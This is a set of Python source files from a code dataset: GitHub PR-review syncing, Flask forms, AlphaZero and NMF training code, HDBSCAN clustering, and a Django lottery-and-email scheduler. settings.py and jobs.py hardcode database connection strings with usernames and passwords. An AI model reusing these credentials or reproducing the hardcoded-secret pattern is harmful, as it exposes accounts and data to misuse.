gim.core.models import Issue\n\n has_next_page = True\n\n per_page = normal_per_page = 30\n\n done = 0\n failed = 0\n total = self.issues.filter(is_pull_request=True).count()\n\n variables = {\n 'repositoryOwnerLogin': self.owner.username,\n 'repositoryName': self.name,\n }\n debug_context = {\n 'total': total,\n }\n\n while has_next_page and (not max_prs or done < max_prs):\n variables['nbPullRequestsToRetrieve'] = per_page\n if next_page_cursor:\n variables['nextPullRequestsPageCursor'] = next_page_cursor\n debug_context.update({\n 'failed': failed,\n 'done': done,\n })\n\n manage_reviews = True\n\n try:\n data = fetch_graphql(gh, self.GRAPHQL_FETCH_ALL_REVIEWS, variables, 'RepositoryAllPullRequestsReviews', debug_context)\n except GraphQLGithubInternalError:\n # We don't know which one fails, so we retry only with the half.\n # When only one PR, and a failure, we have our failing PR, and\n # will fetch it in a very light way to get the number\n\n if per_page > 1:\n per_page /= 2\n continue\n\n # here we have only one left to fetch\n failed += 1\n manage_reviews = False\n debug_context['failed'] = failed\n data = fetch_graphql(gh, self.GRAPHQL_FETCH_ALL_REVIEWS_LITE, variables, 'RepositoryAllPullRequestsReviewsLite', debug_context)\n\n # now we can get the pr and retrieve its reviews\n pr_number = data.repository.pullRequests.edges[0].node.number\n try:\n pr = self.issues.get(number=pr_number)\n pr.fetch_pr_reviews(gh)\n except Issue.DoesNotExist:\n pass\n else:\n done += 1\n\n # we can restore the qtt per page\n per_page = normal_per_page\n # and let the process continue using pagination info\n\n pulls_node = data.repository.pullRequests\n\n has_next_page = pulls_node.pageInfo.hasPreviousPage\n if has_next_page:\n next_page_cursor = pulls_node.pageInfo.startCursor\n else:\n next_page_cursor = None\n\n if not manage_reviews:\n continue\n\n # now work on each retrieved pr\n for edge in pulls_node.get('edges', []):\n try:\n self._manage_pr_reviews_from_fetch(\n gh,\n self.issues.get(number=edge.node.number),\n edge.get('node', {}).get('reviews', {})\n )\n except Issue.DoesNotExist:\n pass\n else:\n done += 1\n\n return total, done, failed, next_page_cursor\n\n def fetch_updated_pr_reviews(self, gh, prs=None, nb_prs_by_query=10, max_prs=None): # more nb_prs_by_query is too much complexity for github\n\n # get the list of PRs to fetch: the ones where it was never fetched, or the one where it\n # was fetched before the last updated at\n if prs is None:\n prs = self.issues.filter(is_pull_request=True).filter(\n models.Q(pr_reviews_fetched_at__isnull=True)\n |\n models.Q(pr_reviews_fetched_at__lt=models.F('updated_at'))\n ).exclude(\n pr_reviews_fetch_failed=True\n ).exclude(\n github_pr_id__isnull=True\n ).select_related(\n 'repository__owner'\n ).order_by('-updated_at')\n\n # don't fetch reviews for prs for which the global review fetch is not done yet\n from gim.core.tasks.repository import FirstFetchStep2\n if FirstFetchStep2.collection(identifier=self.pk, queued=1):\n try:\n oldest_updated_at = self.issues.filter(pr_reviews_fetched_at__isnull=False).order_by('updated_at').values_list('updated_at', flat=True)[0]\n except IndexError:\n pass\n else:\n prs = prs.filter(updated_at__gt=oldest_updated_at)\n\n total = prs.count()\n\n if total:\n if max_prs:\n prs = prs[:max_prs]\n prs = list(prs)\n else:\n prs = [pr for pr in prs if not pr.pr_reviews_fetch_failed]\n total = len(prs)\n\n if not total:\n return 0, 0\n\n count = 0\n\n failing_prs = {}\n while len(prs) and (not max_prs or count < max_prs):\n current_prs, prs = prs[:nb_prs_by_query], prs[nb_prs_by_query:]\n\n prs_by_id = {pr.github_pr_id: pr for pr in current_prs}\n\n subqueries = [\n self.GRAPHQL_FETCH_REVIEWS_PR_SUBQUERY % {\n 'pr_id': pr.github_pr_id,\n 'pr_idb64': encode_graphql_id_for_object(pr),\n }\n for pr in prs_by_id.values()\n ]\n\n query = reindent(self.GRAPHQL_FETCH_REVIEWS % '\\n'.join(subqueries))\n\n try:\n data = fetch_graphql(gh, query, {}, 'RepositoryPullRequestsReviews', {\n 'repository': self.full_name,\n 'prs_left': len(prs) + len(current_prs),\n 'failed': len(failing_prs),\n })\n except GraphQLGithubInternalError:\n # we'll try them later\n failing_prs.update({pr.pk: pr for pr in current_prs})\n continue\n except GraphQLComplexityError as e:\n # reset list to restart with a lower nb of prs by query\n nb_prs_by_query = e.complexity[1] / (e.complexity[0] / nb_prs_by_query)\n prs = current_prs + prs\n continue\n except GraphQLError as e:\n from gim.core.tasks import FetchIssueByNumber\n do_raise = True\n remove_from_data = set()\n try:\n if e.code == 400:\n # handle deleted issues\n errors = e.response.json.get('errors', [])\n for error in errors:\n if error.get('type') == u'NOT_FOUND':\n do_raise = False\n node_key = error.get('path', [''])[0]\n if node_key.startswith('node'):\n remove_from_data.add(node_key)\n pr_id = node_key[4:] # 'node12345' => 12345\n if pr_id.isdigit():\n try:\n issue = prs_by_id[int(pr_id)]\n except KeyError:\n pass\n else:\n # will delete the issue if it does not exist anymore\n FetchIssueByNumber.add_job('%s#%s' % (issue.repository_id, issue.number))\n\n elif error.get('message') == u'Cannot return null for non-nullable field PullRequestReview.author':\n failing_prs.update({pr.pk: pr for pr in current_prs})\n do_raise = False\n except Exception:\n pass\n\n if do_raise:\n raise\n else:\n data = e.response.json.get('data', None) or {}\n if data:\n for node_key in remove_from_data:\n data.pop(node_key, None)\n data = convert_ids_from_graphql_result(data)\n\n for node_key, node_data in data.iteritems():\n pr = prs_by_id[int(node_key[4:])]\n failing_prs.pop(pr.pk, None)\n self._manage_pr_reviews_from_fetch(\n gh,\n pr,\n node_data.get('reviews', {})\n )\n count += 1\n\n if failing_prs:\n if nb_prs_by_query / 2 > 1:\n count += self.fetch_updated_pr_reviews(gh, failing_prs.values(), nb_prs_by_query / 2)[0]\n else:\n # fetch the reviews one by one\n for pr in failing_prs.values():\n pr.fetch_pr_reviews(gh)\n count += 1\n\n return count, total\n\n\nclass ProtectedBranch(GithubObject):\n repository = models.ForeignKey('Repository', related_name='protected_branches')\n name = models.TextField(db_index=True)\n require_status_check = models.BooleanField(default=False)\n require_status_check_include_admins = models.BooleanField(default=False)\n require_up_to_date = models.BooleanField(default=False)\n require_approved_review = models.BooleanField(default=False)\n require_approved_review_include_admins = models.BooleanField(default=False)\n etag = models.CharField(max_length=64, blank=True, null=True)\n\n github_api_version = 'loki-preview'\n github_identifiers = {'repository__github_id': ('repository', 'github_id'), 'name': 'name'}\n\n objects = ProtectedBranchManager()\n\n class Meta:\n app_label = 'core'\n\n def __unicode__(self):\n return u'%s' % self.name\n\n @property\n def github_callable_identifiers(self):\n return self.repository.github_callable_identifiers_for_protected_branches + [\n self.name,\n 'protection',\n ]\n\n def fetch(self, gh, defaults=None, force_fetch=False, parameters=None, meta_base_name=None, github_api_version=None):\n if defaults is None:\n defaults = {}\n if not defaults.get('fk', {}):\n defaults['fk'] = {}\n if not defaults.get('repository'):\n defaults['fk']['repository'] = self.repository\n if not defaults.get('simple', {}):\n defaults['simple'] = {}\n if not defaults['simple'].get('name'):\n defaults['simple']['name'] = self.name\n\n try:\n return super(ProtectedBranch, self).fetch(gh, defaults, force_fetch, parameters, meta_base_name, github_api_version)\n except ApiNotFoundError:\n # the branch is not protected anymore\n self.delete()\n return None\n\n\nclass GitHead(GithubObject):\n repository = models.ForeignKey('Repository', related_name='git_heads')\n ref = models.TextField(db_index=True) # without 'refs/heads/'\n sha = models.CharField(max_length=40)\n etag = models.CharField(max_length=64, blank=True, null=True)\n\n github_identifiers = {'repository__github_id': ('repository', 'github_id'), 'ref': 'ref'}\n\n class Meta:\n app_label = 'core'\n\n objects = GitHeadManager()\n\n def __unicode__(self):\n return u'%s' % self.ref\n\n @property\n def github_callable_identifiers(self):\n return self.repository.github_callable_identifiers_for_git_heads + [\n self.ref,\n ]\n\n def fetch(self, gh, defaults=None, force_fetch=False, parameters=None, meta_base_name=None, github_api_version=None):\n if defaults is None:\n defaults = {}\n if not defaults.get('fk', {}):\n defaults['fk'] = {}\n if not defaults.get('repository'):\n defaults['fk']['repository'] = self.repository\n if not defaults.get('simple', {}):\n defaults['simple'] = {}\n if not defaults['simple'].get('ref'):\n defaults['simple']['ref'] = self.ref\n\n try:\n return super(GitHead, self).fetch(gh, defaults, force_fetch, parameters, meta_base_name, github_api_version)\n except ApiNotFoundError:\n # the head doesn't exist anymore\n self.delete()\n return None\n\n @property\n def github_url(self):\n return self.repository.github_url + '/tree/%s' % self.ref\n","sub_path":"gim/core/models/repositories.py","file_name":"repositories.py","file_ext":"py","file_size_in_byte":52161,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"334891012","text":"from flask.ext.wtf import Form\nfrom wtforms import TextField, BooleanField, TextAreaField, SelectField\nfrom wtforms.validators import Required, Length\nfrom models import User\nfrom flask.ext.babel import gettext\n\nclass LoginForm(Form):\n\topenid = TextField('openid', validators = [Required()])\n\tremember_me = BooleanField('remember_me', default = False)\n\nclass EditForm(Form):\n\tnickname = TextField('nickname', validators=[Required()])\n\tabout_me = TextAreaField('about_me', validators=[Length(min = 0, max = 140)])\t\n\tlanguage = SelectField(u'language', coerce=int)\n\n\tdef __init__(self, original_nickname, *args, **kwargs):\n\t\tForm.__init__(self, *args, **kwargs)\n\t\tself.original_nickname = original_nickname\n\n\tdef validate(self):\n\t\tif not Form.validate(self):\n\t\t\treturn False\n\t\tif self.nickname.data == self.original_nickname:\n\t\t\treturn True\n\t\tif self.nickname.data != User.make_valid_nickname(self.nickname.data):\n\t\t\tself.nickname.erros.append(gettext('This nickname has invalid chars.'))\n\t\t\treturn False\t\t\t\n\t\tuser = User.query.filter_by(nickname = self.nickname.data).first()\n\t\tif user != None:\n\t\t\tself.nickname.errors.append(gettext('This nickname is already in user. Please choose another one'))\n\t\t\treturn False\n\t\treturn True\n\nclass PostForm(Form):\n\tpost = TextField('post', validators = [Required()])\t\t\t\n\nclass SearchForm(Form):\n\tsearch = TextField('search', validators = [Required()])\t\n","sub_path":"app/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":1389,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"476881120","text":"import itertools\nimport logging\nimport os\nimport time\nfrom functools import partial\nfrom pathlib import Path\nfrom typing import Dict, Optional\n\nfrom numpy import array\n\nimport sqlalchemy\nimport tensorflow as tf\nfrom tensorflow.python.keras.preprocessing.sequence import pad_sequences\n\nfrom rlmolecule.alphazero.alphazero_problem import AlphaZeroProblem\nfrom rlmolecule.alphazero.alphazero_vertex import AlphaZeroVertex\nfrom rlmolecule.alphazero.tf_keras_policy import KLWithLogits, TimeCsvLogger\n\nfrom hallway_state import HallwayState\nfrom model import build_policy_trainer\n\nlogger = logging.getLogger(__name__)\n\n\nclass HallwayAlphaZeroProblem(AlphaZeroProblem):\n def __init__(self,\n engine: sqlalchemy.engine.Engine,\n policy_checkpoint_dir: Optional[str] = None,\n hallway_size: int = 5,\n hidden_layers: int = 3,\n hidden_dim: int = 16,\n **kwargs\n ) -> None:\n\n super(HallwayAlphaZeroProblem, self).__init__(engine, **kwargs)\n self.policy_model = build_policy_trainer(hallway_size, hidden_layers, hidden_dim)\n self.policy_checkpoint_dir = policy_checkpoint_dir\n policy_model_layer = self.policy_model.layers[-1].policy_model\n self.policy_evaluator = tf.function(experimental_relax_shapes=True)(policy_model_layer.predict_step)\n self._checkpoint = None\n\n\n def initialize_run(self):\n \"\"\"\n Load the most recent policy checkpoint\n \"\"\"\n super(HallwayAlphaZeroProblem, self).initialize_run()\n\n if self.policy_checkpoint_dir:\n new_checkpoint = tf.train.latest_checkpoint(self.policy_checkpoint_dir)\n if new_checkpoint != self._checkpoint:\n self._checkpoint = new_checkpoint\n status = self.policy_model.load_weights(self._checkpoint)\n status.assert_existing_objects_matched()\n logger.info(f'Loaded checkpoint {self._checkpoint}')\n elif new_checkpoint == self._checkpoint:\n logger.info(f'Skipping already loaded {self._checkpoint}')\n else:\n logger.info('No checkpoint found')\n\n def _get_network_inputs(self, state: HallwayState) -> Dict:\n \"\"\"Returns a dictionary of network input arrays.\"\"\"\n return {\"position\": array([state.position]), \"steps\": array([state.steps])}\n\n def _get_batched_network_inputs(self, parent: AlphaZeroVertex) -> Dict:\n \"\"\"\n :return the given nodes policy inputs, concatenated together with the\n inputs of its successor nodes. Used as the inputs for the policy neural\n network\n \"\"\"\n policy_inputs = [self._get_network_inputs(vertex.state)\n for vertex in itertools.chain((parent,), parent.children)]\n return {key: pad_sequences([elem[key] for elem in policy_inputs], padding='post')\n for key in policy_inputs[0].keys()}\n\n def get_value_and_policy(self, parent: AlphaZeroVertex) -> (float, {AlphaZeroVertex: float}):\n\n values, prior_logits = self.policy_evaluator(self._get_batched_network_inputs(parent))\n\n # Softmax the child priors. Be careful here that you're slicing all needed\n # dimensions, otherwise you can end up with elementwise softmax (i.e., all 1's).\n priors = tf.nn.softmax(prior_logits[1:, 0, 0]).numpy().flatten()\n\n # Update child nodes with predicted prior_logits\n children_priors = {vertex: prior for vertex, prior in zip(parent.children, priors)}\n value = float(tf.nn.sigmoid(values[0]))\n\n return value, children_priors\n\n\n def _get_network_inputs_from_serialized_parent(\n self,\n serialized_parent: tf.Tensor) -> ({}, {}):\n\n parent = HallwayState.deserialize(serialized_parent.numpy().decode())\n\n policy_inputs = [self._get_network_inputs(parent)\n for state in itertools.chain((parent,), parent.get_next_actions())]\n\n policy_inputs = {key: pad_sequences([elem[key] for elem in policy_inputs], padding='post')\n for key in policy_inputs[0].keys()}\n\n return policy_inputs['position'], policy_inputs['steps']\n\n\n def _create_dataset(self) -> tf.data.Dataset:\n \"\"\"\n Creates a tensorflow dataset pipeline to batch game positions from the replay buffer into\n\n :param problem:\n :return:\n \"\"\"\n\n def get_policy_inputs_tf(parent, reward, visit_probabilities,\n problem: HallwayAlphaZeroProblem) -> {}:\n position, steps = tf.py_function(\n problem._get_network_inputs_from_serialized_parent, inp=[parent],\n Tout=[tf.int64, tf.int64])\n position.set_shape([None, 1])\n steps.set_shape([None, 1])\n return {\"position\": position, \"steps\": steps}, (reward, visit_probabilities)\n\n dataset = tf.data.Dataset.from_generator(\n self.iter_recent_games,\n output_shapes=((), (), (None, )),\n output_types=(tf.string, tf.float32, tf.float32)) \\\n .repeat() \\\n .shuffle(self.max_buffer_size) \\\n .map(partial(get_policy_inputs_tf, problem=self),\n num_parallel_calls=tf.data.experimental.AUTOTUNE) \\\n .padded_batch(self.batch_size,\n padding_values=(\n {\"position\": tf.constant(0, dtype=tf.int64), # Not sure what this should be\n \"steps\": tf.constant(0, dtype=tf.int64)},\n (0., 0.))) \\\n .prefetch(tf.data.experimental.AUTOTUNE)\n \n return dataset\n\n def train_policy_model(\n self,\n steps_per_epoch: int = 750,\n lr: float = 1E-3,\n epochs: int = int(1E4),\n game_count_delay: int = 30,\n **kwargs) -> tf.keras.callbacks.History:\n\n # wait to start training until enough games have occurred\n while len(list(self.iter_recent_games())) < self.min_buffer_size:\n logging.info(f\"Policy trainer: waiting, not enough games found ({len(list(self.iter_recent_games()))})\")\n time.sleep(game_count_delay)\n\n # Create the games dataset\n dataset = self._create_dataset()\n print(dataset)\n\n # Create a callback to store optimized models at given frequencies\n model_checkpoint = tf.keras.callbacks.ModelCheckpoint(\n os.path.join(self.policy_checkpoint_dir, 'policy.{epoch:02d}'),\n save_best_only=False, save_weights_only=True)\n\n # Log the time as well as the epoch to synchronize with the game rewards\n csv_logger = TimeCsvLogger(\n os.path.join(self.policy_checkpoint_dir, 'log.csv'),\n separator=',', append=False)\n\n # Ensure the the policy checkpoint directory exists\n Path(self.policy_checkpoint_dir).mkdir(parents=True, exist_ok=True)\n\n # Compile the model with a loss function and optimizer\n self.policy_model.compile(\n optimizer=tf.keras.optimizers.Adam(lr),\n loss=[tf.keras.losses.BinaryCrossentropy(from_logits=True), KLWithLogits()])\n\n logger.info(\"Policy trainer: starting training\")\n\n return self.policy_model.fit(\n dataset, steps_per_epoch=steps_per_epoch,\n epochs=epochs, callbacks=[model_checkpoint, csv_logger], **kwargs)\n","sub_path":"examples/hallway/hallway_problem.py","file_name":"hallway_problem.py","file_ext":"py","file_size_in_byte":7478,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"266275667","text":"# -*- coding: utf-8 -*-\n\nAPP_MONGO_URI = \"mongodb://user:mongo123098@ds137008.mlab.com:37008/service_hacker_news?retryWrites=false\"\nAPP_MONGO_DB_NAME = \"service_hacker_news\"\nAPP_MONGO_COLLECTION_POSTS = \"posts\"\n\nTEST_MONGO_COLLECTION_POSTS = \"test_posts\"\n\nPARSING_INTERVAL_SEC = 600\nPARSING_TIMEOUT = 30\nPARSING_TRY_LIMIT = 5\n\n","sub_path":"settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":327,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"402401802","text":"from .models import *\nfrom django.conf import settings\n\nfrom apscheduler.events import *\nfrom django_apscheduler.jobstores import DjangoJobStore, register_events, register_job\nfrom apscheduler.schedulers.background import BackgroundScheduler\nfrom apscheduler.executors.pool import ProcessPoolExecutor, ThreadPoolExecutor\nfrom apscheduler.jobstores.sqlalchemy import *\nimport django_rq\nfrom datetime import datetime\nimport pytz\nimport json\nimport logging\nimport time\nimport numpy as np\n\nfrom django.core.mail import send_mail as mail\nfrom django.core.mail import EmailMessage\nfrom django.template.loader import get_template, render_to_string\nfrom django.template import Context\nimport os\n\n########### settings for taskqueue ##########\njobstores = {\n 'default': SQLAlchemyJobStore(url='postgresql+psycopg2://database1_role:database1_password@database1/database1', tablename='apscheduler_jobs')\n}\nexecutors = {\n 'default': ThreadPoolExecutor(20),\n 'processpool': ProcessPoolExecutor(5)\n}\n\njob_defaults = {\n 'coalesce': True,\n 'max_instances': 3\n}\nscheduler = BackgroundScheduler(jobstores=jobstores, executors=executors, job_defaults=job_defaults, daemon=True)\nlogger = logging.getLogger(__name__)\n\ndef schedule_drawing_lottery():\n logger.debug(\"now scheduling function\")\n scheduler.add_job(send_mail, \"date\", args=['draw-lots'], run_date=settings.DRAWING_LOTS_DATE, timezone=\"Asia/Tokyo\", id=\"api.tasks.send_mail\", replace_existing=True)\n logger.debug(\"now after scheduler.add_job\")\n #scheduler.add_listener(event_listener, EVENT_JOB_EXECUTED | EVENT_JOB_ERROR)\n #register_events(scheduler)\n scheduler.start()\n\n\n\"\"\"\ndef event_listener(event):\n if event.exception:\n print(\"The job crashed :(\")\n else:\n print(\"The job worked\")\n scheduler.shutdown(wait=False)\n\"\"\"\n\n\n########## draw lots ###########\ndef draw_lots():\n dictionary = {}\n for event in Team.EVENT_CHOICES:\n teams = Team.objects.filter(event=event[0], is_registered=True) \n team_ids = [team.pk for team in teams]\n\n winner_teams = []\n if not teams:\n # その競技種目に出場チームがなかった場合\n winner_teams = []\n\n elif len(teams) <= settings.NUMBER_OF_WINNER_TEAMS[event[0]]:\n winner_teams = teams\n else:\n data = []\n for team in teams:\n members = team.members.all()\n admission_years = []\n for member in members:\n scraped_year = int(member.email[3:5])\n rounded_year = round(datetime.now().year, -2)\n admission_year = rounded_year + scraped_year if rounded_year < rounded_year + scraped_year < rounded_year + 100 else rounded_year + scraped_year - 100 \n if not datetime.now().year - 3 <= admission_year <= datetime.now().year:\n admission_year = datetime.now().year - 3\n\n admission_years.append(admission_year)\n\n average = np.mean(admission_years)\n data.append(average)\n\n data = np.array(data)\n data = datetime.now().year - data\n data = np.sum(data) - data\n data = data / np.sum(data) # Now, data is a list of probabilities\n\n winner_ids = np.random.choice(team_ids, size=settings.NUMBER_OF_WINNER_TEAMS[event[0]], replace=False, p=data)\n\n for id in winner_ids:\n try:\n team = Team.objects.get(pk=id)\n winner_teams.append(team)\n except Team.DoesNotExist:\n pass\n\n for id in team_ids:\n if id not in winner_ids:\n try:\n team = Team.objects.get(pk=id)\n team.is_registered = False\n team.save()\n except Team.DoesNotExist:\n pass\n \n dictionary[event[0]] = winner_teams\n\n return dictionary\n\ndef send_mail(function, team=None, member_changed=None):\n module_dir = os.path.dirname(__file__)\n\n if function == 'team-create':\n for member in team.members.all():\n title = open(os.path.join(module_dir, 'templates/mail/team-create/subject.txt'), 'r', encoding='utf-8').read()\n msg_html = render_to_string('mail/team-create/body.html', {'member': member, 'team': team})\n msg = EmailMessage(subject=title, body=msg_html, from_email='{from_name} <{from_address}>'.format(from_name=settings.FROM_NAME, from_address=settings.FROM_ADDRESS), bcc=['{to_name} <{to_address}>'.format(to_name=member.name, to_address=member.email)])\n msg.content_subtype = \"html\"\n msg.send()\n elif function == 'team-update':\n for member in team.members.all():\n title = open(os.path.join(module_dir, 'templates/mail/team-update/subject.txt'), 'r', encoding='utf-8').read()\n msg_html = render_to_string('mail/team-update/body.html', {'member': member, 'team': team})\n msg = EmailMessage(subject=title, body=msg_html, from_email='{from_name} <{from_address}>'.format(from_name=settings.FROM_NAME, from_address=settings.FROM_ADDRESS), bcc=['{to_name} <{to_address}>'.format(to_name=member.name, to_address=member.email)])\n msg.content_subtype = \"html\"\n msg.send() \n elif function == 'team-delete':\n for member in team.members.all():\n title = open(os.path.join(module_dir, 'templates/mail/team-delete/subject.txt'), 'r', encoding='utf-8').read()\n msg_html = render_to_string('mail/team-delete/body.html', {'member': member, 'team': team})\n msg = EmailMessage(subject=title, body=msg_html, from_email='{from_name} <{from_address}>'.format(from_name=settings.FROM_NAME, from_address=settings.FROM_ADDRESS), bcc=['{to_name} <{to_address}>'.format(to_name=member.name, to_address=member.email)])\n msg.content_subtype = \"html\"\n msg.send() \n elif function == 'member-create':\n for member in member_changed.team.members.all():\n title = open(os.path.join(module_dir, 'templates/mail/member-create/subject.txt'), 'r', encoding='utf-8').read()\n msg_html = render_to_string('mail/member-create/body.html', {'member': member, 'member_changed': member_changed})\n msg = EmailMessage(subject=title, body=msg_html, from_email='{from_name} <{from_address}>'.format(from_name=settings.FROM_NAME, from_address=settings.FROM_ADDRESS), bcc=['{to_name} <{to_address}>'.format(to_name=member.name, to_address=member.email)])\n msg.content_subtype = \"html\"\n msg.send()\n elif function == 'member-update':\n for member in member_changed.team.members.all():\n title = open(os.path.join(module_dir, 'templates/mail/member-update/subject.txt'), 'r', encoding='utf-8').read()\n msg_html = render_to_string('mail/member-update/body.html', {'member': member, 'member_changed': member_changed})\n msg = EmailMessage(subject=title, body=msg_html, from_email='{from_name} <{from_address}>'.format(from_name=settings.FROM_NAME, from_address=settings.FROM_ADDRESS), bcc=['{to_name} <{to_address}>'.format(to_name=member.name, to_address=member.email)])\n msg.content_subtype = \"html\"\n msg.send()\n elif function == 'member-delete':\n for member in member_changed.team.members.all():\n title = open(os.path.join(module_dir, 'templates/mail/member-delete/subject.txt'), 'r', encoding='utf-8').read()\n msg_html = render_to_string('mail/member-delete/body.html', {'member': member, 'member_changed': member_changed})\n msg = EmailMessage(subject=title, body=msg_html, from_email='{from_name} <{from_address}>'.format(from_name=settings.FROM_NAME, from_address=settings.FROM_ADDRESS), bcc=['{to_name} <{to_address}>'.format(to_name=member.name, to_address=member.email)])\n msg.content_subtype = \"html\"\n msg.send() \n elif function == 'draw-lots':\n winners = draw_lots()\n print(winners)\n titles = {}\n titles['winner'] = open(os.path.join(module_dir, 'templates/mail/winner/subject.txt'), 'r', encoding='utf-8').read()\n titles['loser'] = open(os.path.join(module_dir, 'templates/mail/loser/subject.txt'), 'r', encoding='utf-8').read()\n\n for event, winner_teams in winners.items():\n if len(winner_teams) > 0:\n all_teams = Team.objects.filter(event=event)\n for team in all_teams:\n members = team.members.all()\n for member in members:\n if team in winner_teams:\n msg_html = render_to_string('mail/winner/body.html', {'member': member})\n msg = EmailMessage(subject=titles['winner'], body=msg_html, from_email='{from_name} <{from_address}>'.format(from_name=settings.FROM_NAME, from_address=settings.FROM_ADDRESS), bcc=['{to_name} <{to_address}>'.format(to_name=member.name, to_address=member.email)])\n msg.content_subtype = \"html\"\n msg.send()\n print(\"send message\")\n else:\n msg_html = render_to_string('mail/loser/body.html', {'member': member})\n msg = EmailMessage(subject=titles['loser'], body=msg_html, from_email='{from_name} <{from_address}>'.format(from_name=settings.FROM_NAME, from_address=settings.FROM_ADDRESS), bcc=['{to_name} <{to_address}>'.format(to_name=member.name, to_address=member.email)])\n msg.content_subtype = \"html\"\n msg.send()","sub_path":"backend/sportsfes/api/jobs.py","file_name":"jobs.py","file_ext":"py","file_size_in_byte":9830,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"253176923","text":"n = int(input())\n\n\nv = [int(c) for c in input().split()]\nll = len(v)\nv1 = [0 for _ in range(10**6)]\nv2 = [0 for _ in range(10**6)]\nfor i in range(n):\n if i % 2 == 0:\n v1[v[i]] += 1\n else:\n v2[v[i]] += 1\n\nif v1.index(max(v1)) == v2.index(max(v2)):\n m1 = sorted(set(v1))[-2]\n m2 = sorted(set(v2))[-2]\n ans = min(n-m1-max(v2), n-max(v1)-m2)\n print(ans)\nelse:\n print(n-max(v1)-max(v2))\n","sub_path":"Problems/C/111.py","file_name":"111.py","file_ext":"py","file_size_in_byte":417,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"265717235","text":"import autograd.numpy as np\nfrom Frameworkk.NMF import NMF\nfrom autograd import grad\n\n\nclass NMF_NN(NMF):\n def __init__(self, n_components=0, data=None, scale=.1, layer_sizes=[]):\n NMF.__init__(self, n_components, data)\n self.NET_DEPTH = len(layer_sizes) - 1\n row_size, col_size = data.shape\n self.parameters = self.init_random_params(scale, layer_sizes)\n # Append column latents to end.\n self.parameters.append(scale * np.random.rand(n_components, col_size))\n self.parameters.append(self.data)\n self.parameters = list(self.parameters)\n self.train = self.train_neural_net\n self.inference = self.neural_net_inference\n\n # Credit to David Duvenaud for sleek init code\n def init_random_params(self, scale, layer_sizes, rs=np.random.RandomState(0)):\n \"\"\"Build a list of (weights, biases) tuples,\n one for each layer in the net.\"\"\"\n return [(scale * rs.randn(m, n), # weight matrix\n scale * rs.randn(n)) # bias vector\n for m, n in zip(layer_sizes[:-1], layer_sizes[1:])]\n\n def train_neural_net(self, alpha=.0001, max_iter=20, latent_indices=None, data=None):\n train_data = self.data if data is None else data\n for iter in range(0, max_iter):\n # Get gradients\n grads = grad(self.loss, 0)(self.parameters, train_data)\n\n # Update parameters\n for i in range(self.NET_DEPTH):\n # Updating net weights\n self.parameters[i] = [self.parameters[i][0] - alpha * grads[i][0],\n self.parameters[i][1] - alpha * grads[i][1]]\n # Updating col_latents\n self.parameters[self.NET_DEPTH] += -alpha * grads[self.NET_DEPTH]\n\n def neural_net_inference(self, parameters, data=None):\n net_parameters = parameters[:self.NET_DEPTH]\n colLatents = parameters[self.NET_DEPTH]\n\n # This is broken and stupid\n unweighted_user_latents = self.neural_net_predict(net_parameters, np.transpose(colLatents))\n return np.dot(unweighted_user_latents, colLatents)\n\n def neural_net_predict(self, net_parameters, input_data):\n # Assume 3 layer net, so net_parameters\n W1, b1 = net_parameters[0]\n W2, b2 = net_parameters[1]\n layer2 = relu(np.dot(input_data, W1) + b1)\n layer3 = relu(np.dot(layer2, W2) + b2)\n return layer3\n\n\ndef relu(data):\n return np.maximum(data, 0)\n","sub_path":"Framework/NMF_NN.py","file_name":"NMF_NN.py","file_ext":"py","file_size_in_byte":2487,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"569611700","text":"import numpy as np\nimport pandas as pd\nfrom sklearn.decomposition import PCA\nimport hdbscan\n\n\nclass NestedHDBSCAN():\n def __init__(self):\n pass\n\n def run_clusterer(self, x):\n clusterer = hdbscan.HDBSCAN(min_cluster_size=5, gen_min_span_tree=True, metric='correlation')\n clusterer.fit(x)\n return clusterer.labels_\n\n def extract_features(self, x):\n pca = PCA(n_components=0.95)\n x = pca.fit_transform(x)\n return x\n\n def fit_transform(self, x):\n x = self.extract_features(x)\n labels = self.run_clusterer(x)\n return labels\n\n def run(self, X, Y):\n Y['cluster_id'] = -1\n while True:\n x_iter = X\n x_iter = x_iter.loc[Y['cluster_id'] == -1]\n if x_iter.size == 0:\n break\n labels = self.fit_transform(x_iter)\n if len(np.unique(labels)) == 1:\n break\n offset = Y['cluster_id'].max() + 1\n labels[labels == -1] = -1 - offset\n Y.loc[x_iter.index, 'cluster_id'] = labels + offset\n return Y\n","sub_path":"mstools/cluster/dbscan/NestedHDBSCAN.py","file_name":"NestedHDBSCAN.py","file_ext":"py","file_size_in_byte":1098,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"254091258","text":"import datetime\nimport math\n\nDATE_TIME_OANDA_FORMAT = '%Y-%m-%dT%H:%M:%S.%fZ'\n\n\ndef datetime_to_string(in_datetime):\n return in_datetime.strftime(DATE_TIME_OANDA_FORMAT)\n\n\ndef is_datetime_on_the_granularity(in_datetime, granularity):\n # TODO Support days, weeks, months, years\n time_in_seconds = (in_datetime.hour * 60 * 60) + (in_datetime.minute * 60) + in_datetime.second\n\n resolution = get_granularity_in_seconds(granularity)\n\n return (time_in_seconds % resolution) == 0\n\n\ndef round_time(dt, granularity):\n \"\"\"Round a datetime object to any time laps in seconds\n dt : datetime.datetime object, default now.\n roundTo : Closest number of seconds to round to, default 1 minute.\n Author: Thierry Husson 2012 - Use it as you want but don't blame me.\n http://stackoverflow.com/questions/3463930/how-to-round-the-minute-of-a-datetime-object-python\n \"\"\"\n round_to = get_granularity_in_seconds(granularity)\n\n seconds = (dt - dt.min).seconds\n # // is a floor division, not a comment on following line:\n rounding = (seconds + round_to / 2) // round_to * round_to\n return dt + datetime.timedelta(0, rounding - seconds, -dt.microsecond)\n\n\ndef get_granularity_in_seconds(granularity_str):\n \"\"\"\n Get the granularity in seconds.\n :param granularity_str:\n :return:\n \"\"\"\n if granularity_str == \"S5\":\n return 5\n elif 